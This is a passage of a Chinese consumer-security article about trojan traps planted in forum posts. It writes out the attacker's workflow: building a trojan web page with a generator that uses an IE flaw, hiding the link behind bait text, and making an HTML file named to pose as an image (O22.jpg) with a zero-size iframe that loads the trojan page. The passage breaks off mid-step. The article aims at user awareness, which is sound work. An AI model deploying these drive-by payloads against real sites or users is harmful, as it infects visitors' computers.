小李平时很喜欢泡论坛,这天他到自己常去的一个论坛回帖之后,电脑莫名其妙地重启,重新开机之后感觉系统变得很慢。莫非帖子中暗藏机关?小李更新杀毒软件的病毒库后一查,果然自己的系统中了木马……
论坛往往是一个网站中人气最旺的地方,但很少有人注意到论坛给浏览者带来的安全问题,而像小李这样的遭遇却是真实存在的!下面我们就为大家“挖”出论坛帖子中暗藏的害人陷阱。
浏览帖子有隐忧
现在很多论坛程序在开发时,会添加一些扩展功能,例如:可以在帖子中引用UBB标签,可以在帖子中隐藏网页真实地址,可以在个人签名中加入特殊效果等。
这些功能虽然方便了浏览者,但同时也带来很多安全隐患。恶意攻击者可能借助这些功能,使用网页木马等攻击浏览者的系统。我们在这里模拟攻击者,为大家揭露这些攻击手法。
制造“陷阱”
选择任一功能稍微强大的论坛(例如动网,它在国内非常流行,而且所带的扩展功能非常多)下手。
先利用网页木马生成器制作木马网页,它利用的是IE浏览器漏洞。打开网页木马生成器,单击 “选择”按钮,然后选择木马程序mm.exe,生成2个文件:mm.chm和mm.html(图1)。将这两个文件以及木马程序mm.exe上传到网站空间中,就可以得到一个木马网页,地址以mm.html结尾,例如:http://www.***.com/mm.html)。
图1 利用网页木马生成器生成木马网页
接下来就是利用论坛的一些扩展功能暗布“陷阱”,使浏览者在无意间打开帖子时中招。
使用陷阱
1.陷阱一:文字诱骗
通过帖子中的文字诱骗你单击木马网页链接,这是论坛帖子中最常见的“陷阱”。
攻击者进入准备下手的论坛,申请账号,然后到其中任一版块发表帖子。帖子内容一般是带有诱惑性的信息:
输入完毕之后,发表帖子。
小提示:这里发表帖子使用的“ ”标签是动网论坛的内置标签,可以起到链接的作用,其他论坛也有使用此标签的。
当你浏览这个帖子时,会发现帖子中只显示了文本内容:
这里有最新最热的游戏资料和demo下载,赶快进来吧!
一般不清楚的人都会好奇地打开查看,从而打开了木马网页http://www.***.com/mm.html,使自己的系统被种植了木马。
其实只要把鼠标指针放到文字上,就会在IE浏览器的左下角显示这个链接的真实地址http://www.***.com/mm.html(图2)。
图2 碰到这样的帖子,可得多个心眼
如果你遇到了这样富有诱惑力的帖子,千万不要贸然地打开查看,因为里面可能隐藏的就是木马网页。
2.陷阱二:图片诱骗 在帖子中显示一张很大的图片,你为了观看全貌,就对图片进行点击,选择在新窗口中打开查看。这样就会打开木马网页,而你看到的仍然是图片。 攻击者首先准备一张超宽的图片(超过帖子页面限制),命名为“022.jpg”(此处文件名“022.jpg”中的“0”是阿拉伯数字),将其上传到网站空间得到地址:http://www.***.com/022.jpg,再将以下代码保存在记事本中: <img aligh=middle src="022.jpg"><iframe src="http://www.***.com/mm.html" name="zhu" width="0" height="0" frameborder="0"><br> 保存文件名为:O22.jpg(此处文件名“O22.jpg”中的“O”是大写字母)。 将含有代码的O22.jpg文件上传到网站空间图片文件022.jpg的同一路径下,得到地址:http://www.***.com/O22.jpg,这样就得到了一个图片木马的地址。 小提示:虽然将htm文件的后缀名改为jpg,但是在打开的时候,浏览器仍然会以网页的形式打开,这样就运行了其中的代码,而其中的代码则是链接到木马网页地址http://www.***.com/mm.html,从而使你的系统中木马。 进入论坛,在帖子中输入如下代码(图3): 
